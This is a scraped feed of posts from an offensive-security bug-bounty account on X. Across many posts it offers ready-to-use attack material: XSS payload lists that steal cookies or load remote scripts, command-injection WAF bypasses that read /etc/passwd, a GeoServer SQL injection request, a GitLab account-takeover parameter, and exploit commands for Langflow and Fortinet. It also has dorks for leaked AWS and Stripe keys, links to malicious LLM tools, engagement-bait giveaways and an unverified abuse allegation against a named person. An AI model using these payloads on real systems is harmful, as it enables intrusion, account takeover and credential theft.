"SSRF on Steroids (2025 Edition) Find $$$ via blind SSRF using modern tooling + automation Lets cook: Step 1: Subdomain Enumeration Use parallelized passive + active recon for wide coverage: subfinder -dL targets.txt -all -o subs.txt amass enum -passive -df targets.txt -o amass.txt cat subs.txt amass.txt anew all-subs.txt Step 2: Probe for Live Hosts Use HTTPX with full headers status and IP tracking: cat all-subs.txt httpx -status-code -ip -title -json -o all-live.json jq -r '.url' all-live.json all-live.txt Step 3: Extract URLs (filter static assets) cat all-live.txt gauplus -subs -o"
X Link 2025-04-29T12:56Z 25.9K followers, [---] engagements

"How I went from $0 to $20K in bug bounties using only open-source tools You dont need a huge budget. Just strategy precision and the right stack. Heres the full process I used step by step: 1/10 2/10 Subdomain Enumeration I use Amass with a custom config + passive sources + bruteforce. It finds domains most people miss. amass enum -config /.amass/config.ini -brute -df domains.txt Bonus tip: combine with Wayback and Chaos DB. 3/10 Port Discovery I pair Masscan for speed + Nmap for detail. masscan -p1-65535 TARGET --rate=10000 -oX ports.xml nmap -A -p- -iL targets.txt Masscan finds open ports"
X Link 2025-04-29T16:03Z 25.9K followers, [---] engagements

"Advanced SQL Injection Discovery & Exploitation Pipeline Goal: Identify and exploit injectable parameters across a large surface area using automation and precision. [--]. Param Harvesting + Passive Signal Detection echo "http://target/" gau uro grep "" sed "s/=.*/=A'/" uniq params.txt cat params.txt httpx -mr ".SQL..syntax..error." gau pulls archived URLs via Wayback & CommonCrawl. uro deduplicates. httpx sends injection probes and matches on DB error signals (e.g. Unclosed quotation syntax error). This step passively fingerprints potentially injectable parametersno active exploitation"
X Link 2025-04-30T02:04Z 26K followers, [----] engagements

"Advanced Salesforce Help Desk Misconfiguration Hunting Guide [--]. Subdomain & Asset Discovery Use passive and active enumeration to discover potential Salesforce-based help desk instances: # Passive discovery amass enum -d assetfinder --subs-only gau grep -Ei 'salesforceforce.com' # Certificate transparency curl -s jq -r '..name_value' grep -Ei 'salesforcehelpdesk' Target patterns: *.lightning.force.com *.my.salesforce.com [--]. URL & Endpoint Mapping Map common Salesforce community and help desk paths. Focus on: Case detail pages Guest user views Password reset tokens File attachments Known"
X Link 2025-04-30T04:42Z 25.9K followers, [----] engagements

"🚨 PART [--] ADVANCED BUG BOUNTY RECON PLAYBOOK 🚨 Stealth Automation & Finding What Others Miss Most hunters STOP at surface recon. This is where REAL MONEY starts. Heres how to step into the elite 1% (Stealth + Deep + Automated Recon Blueprint) [--] JS Recon Extract Hidden Gems JavaScript holds endpoints keys secrets. Tools: subjs LinkFinder JSParser subjs -i alive.txt -o jsfiles.txt cat jsfiles.txt LinkFinder -i - -o cli endpoints.txt ✔ Dump JS ✔ Extract endpoints ✔ Create new attack surface [--] Historical Data Mining Go Back in Time Old endpoints often = Forgotten & vulnerable. Tools: waybackurls"
X Link 2025-05-04T01:27Z 26.4K followers, [----] engagements

"🧵 BLACK OPS BUG BOUNTY DOMINATION SYSTEM $50K+ SYSTEM FOR ADVANCED RECON EXPLOIT CHAINS & FULL AUTOMATION (2025+) I built the most ruthless system to hunt 24/7 exploit advanced bugs and destroy lazy hunters. Heres EXACTLY how I print $$$ and how you can too (FULL FREE DROP 👇): ⚔ STEP [--] Automated Recon Arsenal (Recon Blackbox) ✅ Passive Subdomain Recon subfinder (with shuffledns / recursive brute) amass intel passive active puredns bruteforce (with resolvers rotation) ✅ HTTP Probing + Fingerprinting httpx (title tech status tls cdn pipeline) nuclei (ALL + custom exploit templates) aquatone"
X Link 2025-05-08T14:10Z 26.2K followers, 12.2K engagements

"⚠ I Found [---] Private Keys in Public GitHub Repos In [--] Hours. No Login. No Tools. Just Pure OSINT. [--]. No scanners. No bug bounty platforms. No rate limits. Just me a few dorks and one dirty automation loop. In a single day I uncovered: AWS root keys Stripe live tokens GitHub deploy secrets Google Cloud service creds All public. All real. [--]. Step 1: Advanced GitHub Dorking Most of you stop at .env. Thats rookie mode. You want the real gold Use: filename:.env AWS_SECRET_ACCESS_KEY extension:json "private_key" NOT test stripe live_ path:/config prod AND "password" Then chain these with:"
X Link 2025-05-10T02:32Z 26.5K followers, [----] engagements

"🚨 ONLY for [--] people 🚨 Im dropping my REAL OSCP exam report [--] pages full of working Nmap scans FTP exploits Active Directory enumeration & privilege escalation paths 👀 💣 This is NOT public. Its PRIVATE. 💥 If this post hits 1M impressions Im choosing [--] winners. 👇 TO ENTER 👇 ✅ LIKE 🔁 REPOST 👣 FOLLOW 🧠 COMMENT: Im ready to earn my OSCP. Winners will be contacted directly. Lets see whos serious. 👇 #OSCP #BugBounty #Hacking #CyberSecurity #Infosec #RedTeam"
X Link 2025-06-02T17:30Z 27.6K followers, 38.6K engagements

"🚨 KaliGPT Redefining Cybersecurity with AI-Powered Precision. In a world where threats evolve fast KaliGPT is your tactical edge. 🔗 Dive into the tech: 💬 Go straight to the chat: #CyberSecurity #AI #KaliGPT #BugBounty #InfoSec https://chat.openai.com/g/g-uRhIB5ire-kali-gpt https://xis10cial.com/ai/%F0%9F%90%89kali-gpt/ https://chat.openai.com/g/g-uRhIB5ire-kali-gpt https://xis10cial.com/ai/%F0%9F%90%89kali-gpt/ https://chat.openai.com/g/g-uRhIB5ire-kali-gpt https://xis10cial.com/ai/%F0%9F%90%89kali-gpt/ https://chat.openai.com/g/g-uRhIB5ire-kali-gpt"
X Link 2025-06-15T13:58Z 27K followers, [----] engagements

"🤬CVE-2025-49113: PostAuth Remote Code Execution in Roundcube via PHP Object Deserialization FOFA Link: FOFA Query: app="roundcube" Results: [--------] CVSS: [---] https://nvd.nist.gov/vuln/detail/CVE-2025-49113 https://en.fofa.info/resultqbase64=YXBwPSJyb3VuZGN1YmUi https://nvd.nist.gov/vuln/detail/CVE-2025-49113 https://en.fofa.info/resultqbase64=YXBwPSJyb3VuZGN1YmUi"
X Link 2025-06-15T20:39Z 28.8K followers, 14.5K engagements

"🚨 CVE-2025-3248 Remote and unauthenticated attacker can send crafted HTTP requests to execute arbitrary code Finding Targets To find potential targets use Fofa Fofa Dork: "Langflow" Cloning the Repository First clone the repository: git clone Run the Exploit: python3 Target:port cmd #BugBounty #bugbountytips http://CVE-2025-3248.py https://github.com/verylazytech/CVE-2025-3248 https://github.com/verylazytech/CVE-2025-3248 http://CVE-2025-3248.py https://github.com/verylazytech/CVE-2025-3248 https://github.com/verylazytech/CVE-2025-3248"
X Link 2025-06-17T05:02Z 28.8K followers, [----] engagements

"🚨CVE-2024-55591: Fortinet FortiOS Authentication Bypass ZoomEye Link: ZoomEye Dork: app="Fortinet Firewall" Results: [-------] Advisory: PoC: CVSS: [---] https://github.com/watchtowrlabs/fortios-auth-bypass-poc-CVE-2024-55591 https://nvd.nist.gov/vuln/detail/cve-2024-55591 https://www.zoomeye.ai/searchResultq=YXBwPSJGb3J0aW5ldCBGaXJld2FsbCI%3D https://github.com/watchtowrlabs/fortios-auth-bypass-poc-CVE-2024-55591 https://nvd.nist.gov/vuln/detail/cve-2024-55591 https://www.zoomeye.ai/searchResultq=YXBwPSJGb3J0aW5ldCBGaXJld2FsbCI%3D"
X Link 2025-06-17T18:13Z 27.7K followers, [----] engagements

"😎I brought you the Recon Trinity. Its not just a one-liner. Its a precision-engineered killchain-driven pipeline that unites the raw crawling power of Katana the validation muscle of HTTPX and the surgical strike capabilities of Nuclei. For the hunters. The ghosts. The ones who see signal through noise. Let me introduce you to the Holy Recon Trinity: Katana Crawl Deep JS-Aware HTTPX Validate Enrich Strip the Dead Weight Nuclei Attack Audit Exploit Who What When Where Why And how Eminem The Way I Am 🎤 and also every solid hacker asking the right questions. The One-Liner That Changes"
X Link 2025-06-19T14:23Z 27.7K followers, 12.4K engagements

"Offensive Security notes 🔥📢 Welcome to the Linux Privilege Escalation Guide within my OSCP [----] (Offensive Security Certified Professional) notes. 🚀🚀🚀 "Access to my OSCP Linux Privilege Escalation notes is limited to a select group. First [----] people are eligible to receive access to OSCP Notes If you'd like to receive these notes please 👉follow me 👉repost and drop 👉Yes and send me a private direct message. This offer is exclusively for verified users not new accounts." In this comprehensive resource we will explore the intricacies of escalating privileges on Linux systems providing"
X Link 2025-06-27T03:30Z 28.1K followers, 29.4K engagements

"🚨 EXPOSED: $5000+ AI AGENTS LEAKED (Free Access) 🚨 200+ plug-and-play AI agents built for social media sales scraping support content devops & more just went public. 🧠 Agents include: ✅ Social Media Agents ($8K builds) ✅ Lead Booking / Cold Outreach ($6K) ✅ Data Scraping Agents ($8K+) ✅ Customer Support & HR ($5K+) ✅ Creative / Legal / DevOps / Analytics and more 📂 20+ industries. Hundreds of automation-ready agents. All workflows optimized for n8n Zapier and custom stacks. 💣 Im giving away the entire Google Drive for FREE. Only for [--] hours. 👉 🔁 RT + Follow + Comment AGENTS and Ill DM"
X Link 2025-07-07T21:03Z 28.1K followers, [----] engagements

"💣 Elite-Level XLSX XXE Payload Delivery Chain for Web App Compromise & Bounty Farming 🧠 TL;DR: Turn Excel Into an RCE Vector via Blind XXE Exploit the widespread assumption that .xlsx files are harmless. Embed XXE payloads inside Office XML files get blind interactions through Burp Collaborator and trigger internal server parsing potentially leading to: SSRF File exfiltration Credential leakage Cloud metadata access And even command execution 🎯 Objective: Make Money with Excel Hacks You profit when: The Excel file upload feature leads to XXE You get outbound HTTP/DNS pings to Burp"
X Link 2025-07-09T18:17Z 28.1K followers, [----] engagements

"An OSINT tool to search for accounts by username and email in social networks. https://github.com/p1ngul1n0/blackbird https://github.com/p1ngul1n0/blackbird"
X Link 2025-07-22T01:49Z 28.4K followers, [----] engagements

"XSS Payload Written In Arabic =''=+=+=+=++== =+++=++=+(.+)++++++++(+++++"(1)")() XSS Payload Written in Russian =''=+=+=+=++== =+++=++=+(.+)++++++++(+++++"('')")() XSS Payload Written in Ancient Indus Language 📜 =''=+=+=+=++== =+++=+ +=+(.+)++++++++(+++++"('')")() XSS Payload Written In Japanese =''=+=+=+=++== =+++=+ +=+(.+)++++++++(+++++"('')")() XSS Payload Written In Chinese =''=+=+=+=++== =+++=+ +=+(.+)++++++++( +++++"('')" )()"
X Link 2025-08-06T17:33Z 28.4K followers, [----] engagements

"Reflected or Stored XSS: ----------------------------- scriptsvg/onload=promptdocument.cookie javascript:alert(document.domain); -- javaDISABLEscript:alert(document.domain); javanscript:alert(document.domain);// -- success iframe %00 src=" javascript:prompt(document.cookie) "%00 script src="data:text/javascriptalert(1)"/script dETAILS%0aopen%0aonToGgle%0a%3d%0aa%3dprompta(origin)%20x u003cimgu0020srcu003dxu0020onerroru003du0022confirm(document.domain)u0022u003e u003cimgu0020srcu003dxu0020onerroru003du0022confirm(document.domain)u0022u003e"
X Link 2025-08-06T18:18Z 28.4K followers, [---] engagements

"Traitor - Exploit Low-Hanging Fruit Automatically - Nearly all of GTFOBins Writeable docker.sock CVE-2022-0847 (Dirty pipe) CVE-2021-4034 (pwnkit) CVE-2021-3560 - Repo: - Creator: @liam_galvin - - #infosec #CTF #CyberSecurity #bugbountytips #linux https://github.com/liamg/traitor https://github.com/liamg/traitor"
X Link 2023-09-25T07:49Z 30K followers, [----] engagements

"Ridiculously fast DNS/Network/Port Scanner - (Skanuvaty)🤯 - In testing I was able to discover 1000's of subdomains in less than [--] seconds. Check the repo for more info - Repo: - Creator: @Esc4iCEscEsc - #CyberSecurity #bugbountytips #CTF #infosec https://github.com/Esc4iCEscEsc/skanuvaty https://github.com/Esc4iCEscEsc/skanuvaty"
X Link 2023-09-27T08:01Z 28.8K followers, 32.8K engagements

"Free Complete Data Science 📁 😎😎😎😎😎😎😎😎😎😎😎 https://mega.nz/folder/5Wp3nIiD#qsenYaT31KWhSEGGEAzOAQ https://mega.nz/folder/5Wp3nIiD#qsenYaT31KWhSEGGEAzOAQ"
X Link 2023-09-30T03:17Z 28.8K followers, 11.5K engagements

"If you've found an OS command Injection with WAF enabled special characters like (/"'&()-;:.) and whitespaces blocked. Try this method to bypass. - E.g.: reading /etc/passwd file: cat$IFS$9$PWD%%a-zec$PWD%%a-z*pss - Credit: Aysar Harb - #cybersecurity #pentesting"
X Link 2023-10-02T09:17Z 30K followers, 28.5K engagements

"Bug Bounty Tips and Tricks using CHATGPT #1🚀🚀🚀🚀🚀🚀 Download: Credit: 👉👉Joas A #hacking #redteam #bugbounty #chatgpt #openai #AI https://drive.google.com/file/d/1_0HOT15PdQcPkNJ9UKepxQs6s7A1N00p/view https://drive.google.com/file/d/1_0HOT15PdQcPkNJ9UKepxQs6s7A1N00p/view"
X Link 2023-10-22T06:24Z 28.8K followers, 22.3K engagements

"CVE-2023-25157 GET /geoserver/owsservice=wfs&version=1.0.0&request=GetFeature&typeNamosloe=gwpd:chinamap11&CQL_FILTER=strStartsWith%28Vatican City%2C%27x%27%27%29+%3D+true+and+1%3D%28SELECT+CAST+%28%28SELECT+version()%29+AS+INTEGER%29%29+--+%27%29+%3D+true HTTP/1.1 #CVE #Poc https://twitter.com/i/web/status/1739190775752134770 https://twitter.com/i/web/status/1739190775752134770"
X Link 2023-12-25T07:46Z 30K followers, 18.1K engagements

"🔖GitLab CVE-2023-7028 - Uncover account takeover potential with a simple password reset method. Known POC: useremail=valid@email.com&useremail=attacker@email.com Identifying vulnerable targets: [--]. Utilize the nuclei template to spot exposed Gitlab Instances. [--]. Hunt for potentially valid victim org emails through various sources. An effortless choice [--]. Install and execute the Python script on these hosts. If the target is vulnerable you'll likely receive an email on your attacker-controlled server. Usage: -u URL -v victim@example.com -a attacker@wearehackerone.com #BugBounty #recon"
X Link 2024-01-19T06:28Z 30K followers, 18.2K engagements

"🤯🤯Crazy Tool🤯🤯 🔖Axiom is a dynamic infrastructure framework to efficiently work with multi-cloud environments build and deploy repeatable infrastructure focused on offensive and defensive security. #DAY12 [--]. The Introduction to Axiom tool [--]. Axiom Bug Bounty Tool Core Functionality [--]. Managing AXIOM Instances [--]. Creating Custom AXIOM Modules [--]. Mass Hunting For Misconfigured S3 Buckets (AXIOM) [--]. Mass Cross Site Scripting Hunting (AXIOM) [--]. Mass Hunting for Leaked Sensitive Documents (AXIOM) [--]. Hunting Blind XSS on the Large Scale Part1 Practical Techniques [--]. Hunting Blind XSS"
X Link 2024-02-16T04:55Z 28.8K followers, 17.2K engagements

""iframe "iframe "img src=1 onerror=alert(1).gif "img src=1 onerror=alert(1).gif "img src="x:x" onerror="alert(XSS)" "img src="x:x" onerror="alert(XSS)" "img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vaGFja2Vyb25lb2ZqYWFhaC54c3MuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 "img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vaGFja2Vyb25lb2ZqYWFhaC54c3MuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 "img src=x onerror=javascript:alert(1) "img src=x onerror=javascript:alert(1) "img src=x onerror=javascript:alert("1") "img src=x"
X Link 2024-04-07T04:04Z 28.8K followers, [----] engagements

"x='%' xss:ex/XSS////pression(alert("XSS"))' xss:ex/XSS////pression(alert("XSS"))' xss:ex/XSS////pression(alert("XSS"))' xss:ex/XSS////pression(alert("XSS"))' xyz onerror=alert(6); xyz onerror=alert(6); x/titleimg src%3dx onerror%3dalert(1) x/titleimg src%3dx onerror%3dalert(1) y=aalert/a;contenty(123) y=aalert/a;contenty(123) z" onmouseover="alert('Hackerone')" style="position:fixed;left:0;top:0;width:9999px;height:9999px;" z" onmouseover="alert('Hackerone')" style="position:fixed;left:0;top:0;width:9999px;height:9999px;""
X Link 2024-04-07T04:04Z 28.8K followers, [----] engagements

"🔥 XSS PAYLOADS 🔥 [--]. base href="alert(1)" onfocus="a = //(/+)$/.exec(baseURI); eval(a1);" tabindex=1 style="display:block" autofocus/base [--]. img%20hrEF="x"%20sRC="data:x"%20oNLy=1%20oNErrOR=prompt1 [--]. img+src=oNlY=1+ onerror="alert('a' 'x' 'b' 'x' 'c' 's'.map(c = c.replace(/abc/g '')).join(''))" [--]. img+src=oNlY=1+ onerror="alert('x' String.fromCharCode(121) 'x' 's'.filter(c = c.charCodeAt(0) == 121).join(''))" [--]. %3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E [--]. img/src/onerror=setTimeout(atob(/YWxlcnQoMTMzNyk/.source)) [--]. details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open"
X Link 2024-08-20T04:50Z 28.8K followers, 12.9K engagements

"This Guy is another level Top G Video surfaces of Andrew Tate allegedly beating on his sex slave 😳 @TateTheTalisman @Cobratate"
X Link 2025-02-27T03:35Z 25.1K followers, [--] engagements

"This Guy is another level Top G Lets share this please with everyone Video surfaces of Andrew Tate allegedly beating on his sex slave 😳 @TateTheTalisman @Cobratate"
X Link 2025-02-27T14:46Z 25.1K followers, [--] engagements

"🔥 Advanced Command Injection Playbook (2025+ Edition) [--] Command Injection Discovery (Modern Fuzzing) When normal payloads fail try character transformations + detection vectors: Unicode / Encoding / Special chars %7C && %26%26 ; %3B %60 $(cmd) $IFS$(cmd) or $IFS Trailing special characters (bypass sanitizers) whoami# whoami%0a whoami%0d%0a whoami;# Nested / obfuscated execution $(whoami) whoami $(echo d2hvYW1pCg== base64 -d) Payload padding (avoid WAF keyword detection) /bin///sh -c whoami echo$IFS"test" bash -c 'echo hacked' [--] Blind & Out Of Band (OOB) Command Injection Out of Band DNS /"
X Link 2025-05-06T04:46Z 28.8K followers, [----] engagements

"🚨 FREE Bug Bounty Course Drop From Zero Hero in Bug Bounty Hunting 🐞💻 [--] Follow me [--] Turn on post notifications 🔔 [--] Retweet this post Lets build the next wave of bug bounty hunters 👊 https://drive.google.com/drive/mobile/folders/1t-hTqg0-02t0cnc5SypHnb8t3CfE3bXU https://drive.google.com/drive/mobile/folders/1t-hTqg0-02t0cnc5SypHnb8t3CfE3bXU"
X Link 2025-10-10T04:18Z 28.8K followers, [----] engagements

"Why defenders & bug bounty hunters should care: KawaiiGPT: Free WormGPT variant GitHub: Write-up : https://unit42.paloaltonetworks.com/dilemma-of-ai-malicious-llms/ https://github.com/MrSanZz/KawaiiGPT https://unit42.paloaltonetworks.com/dilemma-of-ai-malicious-llms/ https://github.com/MrSanZz/KawaiiGPT"
X Link 2025-11-28T02:07Z 28.8K followers, [----] engagements

"🚨 POC for CVE-2025-55182 that works on Next.js 16.0.6 Here are the exact battle-tested queries you need Censys Shodan FOFA ZoomEye Quake BinaryEdge and Nuclei matchers all tuned specifically to find Next.js RSC / React Server Components instances vulnerable to CVE-2025-55182 (React2Shell). ✅ [--]. SHODAN QUERY (380K+ ASSETS) Find all servers leaking RSC Server Actions: Basic Query "Vary: RSC Next-Router-State-Tree" More Aggressive Variant http.headers.vary:"RSC" AND http.headers.vary:"Next-Router-State-Tree" Superwide Coverage "Next-Router-State-Tree" OR "x-nextjs-cache" OR "server-actions" OR"
X Link 2025-12-07T06:00Z 28.9K followers, [----] engagements

"🚨 AI is officially a Bug Bounty Cheat Code. Every top hunter is quietly building tools Heres mine. 👇 Just built a custom MCP server that lets AI analyze real logs like a senior DFIR engineer: 🔥 Correlates WAF + auth logs in seconds 🔥 Detects brute-force clusters across entire attack surfaces 🔥 Uncovers coordinated attack campaigns youd NEVER spot manually 🔥 Runs everything with sandboxed safe filesystem access This is how big bounty hunters scale past luck and into repeatable 5-figure findings. If youre still hunting without AI youre already behind. Full breakdown here:"
X Link 2025-12-10T06:10Z 29.2K followers, 31.3K engagements

"🧵 EXTREME Google Dorks for CRITICAL File Upload Vulnerabilities (RCE Account Takeover Cloud Takeover Stored XSS Supply Chain) Most hunters stop at Upload File. Critical hunters hunt processing storage parsing and trust boundaries. 👇 This is where real money is 👇 💀 [--]. Server-Side Processing Uploads (RCE Goldmine) These indicate background parsing conversion or execution. "Processing file" "File is being processed" "Your file is under review" "Parsing file" "Converting file" "File conversion started" "Upload successful processing" 🔥 Why critical: FFmpeg / ImageMagick / LibreOffice / Pandoc"
X Link 2025-12-13T03:01Z 28.9K followers, [----] engagements

"Next.js wasnt built for this 😈 RSC RCE (CVE-2025-55182). 💣 Why This Beats @_coffinxp7 and @intigriti s Method : keyword grep runtime behavior guessing header+payload confirmation high noise ultra-low noise partial readiness immediate medium scale enterprise-grade 🔥 Phase [--] Smart Tech Fingerprinting cat domains.txt httpx -silent -status-code -title -tech-detect -web-server -cdn -follow-redirects -path"
X Link 2025-12-14T04:55Z 29K followers, 18.4K engagements

"🧵 + Browser Extensions Every Bug Bounty Hunter Should Know These tools help with recon XSS IDOR secrets discovery JS analysis and productivity. Bookmark this 🫡 🔐 Secrets & Recon [--] TruffleHog Finds exposed API keys & secrets directly in websites 🔗 [--] Wappalyzer Detects CMS frameworks analytics cloud providers 🔗 [--] Finds company email patterns (useful for reporting & OSINT) 🔗 [--] FindSomething Discovers hidden parameters & potential keys 🔗 🧪 Exploitation & Testing [--] HackTools Payloads encoders wordlists one-click utilities 🔗 [--] Edit Cookie Modify cookies inspect flags (Secure HttpOnly"
X Link 2025-12-27T07:11Z 30.6K followers, 26K engagements

"### Suggested Fix - Implement server-side API key management - Rotate all exposed credentials immediately - Add CSP headers to prevent inline script execution EOF # Create automated PoC script cat submission/poc/exploit.py 'PYTHON' #/usr/bin/env python3 import requests sys def exploit(target api_key): """Demonstrates full account takeover via exposed API key""" headers = "Authorization": f"Bearer api_key" # Step 1: Enumerate all users users = requests.get(f"target/api/v1/admin/users" headers=headers).json() print(f"+ Discovered len(users) users") # Step 2: Escalate to admin payload = "role":"
X Link 2025-12-29T07:06Z 29.1K followers, [---] engagements

"One of several new PoCs released recently sharing for the bug bounty community 🐞 This PoC demonstrates automated detection and exploitation of a SQL injection vulnerability affecting Mura & Masa CMS powered applications. The issue abuses the contenthistid HTML query parameter in the /_api/json/v1/default endpoint. By appending the escape sequence %5c' its possible to break out of the query context and inject arbitrary SQL payloads. The exploit is fully automated and integrated with Ghauri making it practical for large-scale hunting across vulnerable targets. All credit to the original author"
X Link 2026-01-02T04:16Z 29.3K followers, 10.6K engagements

Limited data mode. Full metrics available with subscription: lunarcrush.com/pricing